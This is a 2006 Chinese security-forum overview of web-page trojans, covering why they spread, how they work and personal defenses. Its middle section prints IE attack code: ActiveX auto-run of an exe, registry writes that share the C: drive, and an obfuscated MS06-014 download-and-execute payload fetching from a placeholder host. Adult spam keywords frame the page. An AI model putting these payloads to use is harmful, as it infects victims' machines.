亚洲中文字幕伊人久久无码_ [原創(chuàng )]網(wǎng)頁(yè)木馬綜述

網(wǎng)頁(yè)木馬綜述

文章作者：金州
信息來(lái)源：邪惡八進(jìn)制信息安全團隊（www.eviloctal.com）

網(wǎng)頁(yè)木馬綜述

前言，又8月份了。又該寫(xiě)東西，一直寫(xiě)不出好的東西。大約還是天分不足，努力不夠。雖然才疏學(xué)淺，還是堅持盡量一個(gè)月弄出點(diǎn)什么，算是學(xué)習筆記了?？纯瓷洗螌?xiě)出來(lái)東西是6月多，一個(gè)多月了。不過(guò)寫(xiě)出來(lái)更失望。仿佛什么都沒(méi)有學(xué)會(huì )，常?？粗?zhù)自己寫(xiě)得垃圾東西不知所措。而時(shí)間流走了，運命唯所遇。東西比想象中的難學(xué)，生活比想象中的艱辛。希望自己有一天能真的寫(xiě)出對自己對別人有幫助的東西。祝福父母弟弟愛(ài)人所有的朋友，所有善良的人。

金州（EST.VIP）2006.8.4

一，總論
二，網(wǎng)頁(yè)木馬的基本工作流程。
三，網(wǎng)頁(yè)木馬的基本防范。
四，參考文獻

一，總論
網(wǎng)頁(yè)木馬一直是國內網(wǎng)絡(luò )流行的東西。（金州注釋?zhuān)瑩笥颜f(shuō)，這種東西在國外并不流行。）之所以比較流行金州覺(jué)得有如下原因，
1.網(wǎng)頁(yè)木馬在各種網(wǎng)絡(luò )威脅中技術(shù)含量相對來(lái)說(shuō)屬于較低的類(lèi)型。這就意味著(zhù)他便于制作推廣。
2.免費空間的增多和個(gè)人建站的流行，給網(wǎng)頁(yè)木馬客觀(guān)附帶的造就了很大的生存空間。
3.國內上網(wǎng)人數的奇跡般的遞增，使網(wǎng)頁(yè)木馬的受眾層增多。
4.國內上網(wǎng)人群目前普遍安全意識較低，很多人使用盜版系統，有時(shí)候無(wú)法更新補丁或及時(shí)更新補丁，（金州注釋?zhuān)瑖鴥染W(wǎng)頁(yè)木馬大多是針對windows系統的ie的）使針對ie漏洞型的網(wǎng)頁(yè)木馬生存時(shí)間延長(cháng)。
5.網(wǎng)頁(yè)木馬見(jiàn)效快，（金州注釋?zhuān)@個(gè)并不是證明網(wǎng)頁(yè)木馬效率高，而是因為受眾多）
6.很多間接推動(dòng)網(wǎng)絡(luò )安全，擅長(cháng)腳本技術(shù)的人很及時(shí)地推出了眾多簡(jiǎn)便式的網(wǎng)頁(yè)木馬生成器或網(wǎng)頁(yè)木馬程式。此中icefox(冰狐浪子EST)，LCX(haiyangtop.126.com)等對于國內網(wǎng)頁(yè)木馬的流行起到了奠基的作用。

以上jinzhou只是淺顯說(shuō)到網(wǎng)頁(yè)木馬之所以流行的原因。其中也可看到網(wǎng)頁(yè)木馬目前來(lái)說(shuō)還是具有一定優(yōu)點(diǎn)的，尤其是制作操作簡(jiǎn)單。和相對收效快的特點(diǎn)。下面簡(jiǎn)單說(shuō)說(shuō)網(wǎng)頁(yè)木馬的一些不足。
1.很多網(wǎng)頁(yè)木馬針對的是特有的ie漏洞。（金州注釋?zhuān)P(guān)于詳細情形，以下論述）一旦漏洞補上，網(wǎng)頁(yè)木馬失效。ie的漏洞相對系統的核心漏洞來(lái)說(shuō)，修補比較容易。（金州注釋?zhuān)螞r有些人根本就不是用ie和ie內核瀏覽器）
2.網(wǎng)頁(yè)木馬的絕對命中率較低，一般來(lái)說(shuō)10%就很不錯了。（金州注釋?zhuān)@由多種原因造成，比如受眾方做了其他限制，一些殺毒軟件或監控軟件的干擾和警示，對相關(guān)運行網(wǎng)頁(yè)木馬的一些控件的解除，比如更名或刪除debug和wsh等會(huì )使一些網(wǎng)頁(yè)木馬無(wú)法成功，一些安全監視工具會(huì )提示異常運行等等）
3.網(wǎng)頁(yè)木馬沒(méi)有固定目標。缺乏針對性，一定意義上，它只是等著(zhù)別人來(lái)中，它不能主動(dòng)地選擇受眾。
4.網(wǎng)頁(yè)木馬很難感染一些重要部門(mén)的重要機器而不被發(fā)現。網(wǎng)頁(yè)木馬常常無(wú)力顧及木馬被下載后的深入隱藏。很容易被一些有基礎安全知識的人查獲。
5.因為網(wǎng)頁(yè)木馬一旦應用，即等于間接性的公開(kāi)了腳本，具有時(shí)效性。幾乎不可能有永遠好使的網(wǎng)頁(yè)木馬，（金州注釋?zhuān)傅氖蔷W(wǎng)頁(yè)木馬的流程），而一些rootkit甚至能隱藏10年。網(wǎng)頁(yè)木馬類(lèi)流行很少過(guò)年。

目前網(wǎng)頁(yè)木馬的主要危害，金州覺(jué)得主要是利用網(wǎng)頁(yè)木馬控制大量機器，間接形成僵尸網(wǎng)絡(luò )進(jìn)行利用tcp/ip協(xié)議漏洞的DOS/DDOS攻擊。和一些其他的商業(yè)非法活動(dòng)，例如投票，發(fā)布商業(yè)廣告，作為跳板的一些滲透等。很多時(shí)候能造成極大的危害。也就是說(shuō)網(wǎng)頁(yè)木馬的利用趨勢已經(jīng)由開(kāi)始的惡作劇性的對某些機器的窺視變成了利用受眾機器形成一種力量轉做為攻擊和謀求商業(yè)利益的武器。

二，網(wǎng)頁(yè)木馬的基本工作流程。
網(wǎng)頁(yè)木馬的基本工作流程，大致是，
1.受眾打開(kāi)含有網(wǎng)頁(yè)木馬代碼的網(wǎng)頁(yè)，
2.網(wǎng)頁(yè)木馬利用ie漏洞或者一些腳本功能下載一個(gè)可執行文件或腳本。（金州注釋?zhuān)芏鄷r(shí)候根據需要附帶同時(shí)紀錄用戶(hù)ip）
如以下代碼

<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"jinzhou.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>金州提示，網(wǎng)頁(yè)加載中，請稍后....正在運行木馬</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>

保存為jinzhou.html然后在同目錄下放一個(gè)exe文件，起名為jinzhou.exe.運行jinzhou.html,會(huì )出現金州提示，網(wǎng)頁(yè)加載中，請稍后....正在運行木馬，然后那個(gè)jinzhou.exe就會(huì )運行。（金州注釋?zhuān)镜睾瓦h程都會(huì )提示，一般稍有一點(diǎn)安全意識的都不會(huì )中，不過(guò)事實(shí)上這種方法現在仍然會(huì )使很多極其不小心的人上當。此流程比較經(jīng)典。）

< script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>

調用本地控件寫(xiě)注冊表的代碼。此代碼是共享c，當然你可以共享任何盤(pán)。

<script language="vbscript">

const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.xxx.com/jinzhou.EXE", false
xmlHTTP.send
contents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open

oStr.Write(contents)
oStr.SaveToFile "c:\\jinzhou.exe", adSaveCreateOverwrite

</script>
上面以前的Adodb.Stream文件下載代碼核心部分。

<script language="VBScript">
on error resume next
dl = "http://www.xxx.com/jinzhou.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

以上MS06014利用代碼核心。

綜合以上，大致可以看出，網(wǎng)頁(yè)木馬的基礎就是非法讓受眾在不知覺(jué)得情況下改變用戶(hù)配置或下載運行非法程序以非法謀取自己的非法利益。不在一一舉例。在網(wǎng)頁(yè)木馬的歷史上影響重大的還有MHT漏洞即Windows在處理畸形MHTML，能執行任意遠程腳本代碼。（金州注釋?zhuān)瑖鴥纫话惴Q(chēng)為chm木馬。冰狐浪子對此有很詳細的文章。）木馬有2個(gè)組成部分，一個(gè)是利用MHT漏洞的惡意網(wǎng)頁(yè)代碼，另一個(gè)是包含惡意程序的CHM文件。把它們都放到網(wǎng)站上，用戶(hù)訪(fǎng)問(wèn)惡意網(wǎng)頁(yè)時(shí)，會(huì )在沒(méi)有任何安全提示的情況下，自動(dòng)下載遠程CHM文件中的程序并運行。HHCTRL漏洞，HTML幫助ActiveX控件存在問(wèn)題，利用它可以進(jìn)行跨安全區域腳本執行，從而可以下載并自動(dòng)執行遠程惡意程序。HTA漏洞，IE瀏覽器允許HTA類(lèi)型的代碼以全部權限運行。遠程HTA代碼可以調用Wscript.Shell等控件執行用戶(hù)本地的任意程序，iframe溢出等等。網(wǎng)上相關(guān)資料較多。不再贅述?？傮w來(lái)說(shuō)，網(wǎng)頁(yè)木馬的制作并不復雜，它的重點(diǎn)往往會(huì )在加密和輔助的隱藏上。

三，網(wǎng)頁(yè)木馬的基本防范
網(wǎng)頁(yè)木馬的基本防范大概如下幾點(diǎn)，（金州注釋?zhuān)槍€(gè)人的，網(wǎng)頁(yè)木馬絕大多數受眾都是個(gè)人。）

1.，卸載或者改名whs腳本宿主。刪除注冊表｛F935DC22-1CF0-11D0-ADB9-00C04FD58A0B｝
{0D43FE01-F093-11CF-8940-00A0C9054228}，運行regsvr32 scrrun.dll /u 卸載控件等。
2.在我的電腦，屬性，高級，環(huán)境變量中，PATHEXT刪除一些危險的變量，如vbs,vbe,js等?；蛟谖募A選項，文件類(lèi)型中更改vbs，Windows Script Host等的關(guān)聯(lián)。
3.禁用ftp，tftp,或改變端口。等防止網(wǎng)頁(yè)木馬的利用途徑。找到C:\windows\system32\drivers\Etc 記事本打開(kāi)其中的services文件會(huì )看到一些對應的端口，改一下保存就行了。改名debug等。
4.最好安裝殺毒軟件。打開(kāi)實(shí)時(shí)監控，一般網(wǎng)頁(yè)木馬殺毒還是會(huì )報警的。
5.提高警惕性，一旦發(fā)現ie運行不正常，比如卡或者無(wú)故死掉，或者一場(chǎng)閃出，養成立刻檢查系統的習慣。
6.多注意查看網(wǎng)頁(yè)源代碼，無(wú)論多么高明的網(wǎng)頁(yè)木馬，在源代碼中也可以看出端倪。
7.注意更新系統補丁。
等等。
（金州注釋?zhuān)陨蠟閭€(gè)人見(jiàn)解，技術(shù)日新月異，不一定有效全面，個(gè)人愚笨，在學(xué)習中，不足之處見(jiàn)諒。另，文中一些代碼可能會(huì )被殺毒報警，無(wú)害。）

四，參考文獻
邪惡八進(jìn)制信息安全團隊技術(shù)論壇（http://forum.eviloctal.com/）
lcx海陽(yáng)頂端資料（http://haiyang.net/safety/defaultx.asp）

金州 2006.8.4 [est_vip]

描述：pdf文檔
附件：

網(wǎng)頁(yè)木馬綜述.rar (16 K) 下載次數:71

本站僅提供存儲服務(wù)，所有內容均由用戶(hù)發(fā)布，如發(fā)現有害或侵權內容，請點(diǎn)擊舉報。

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久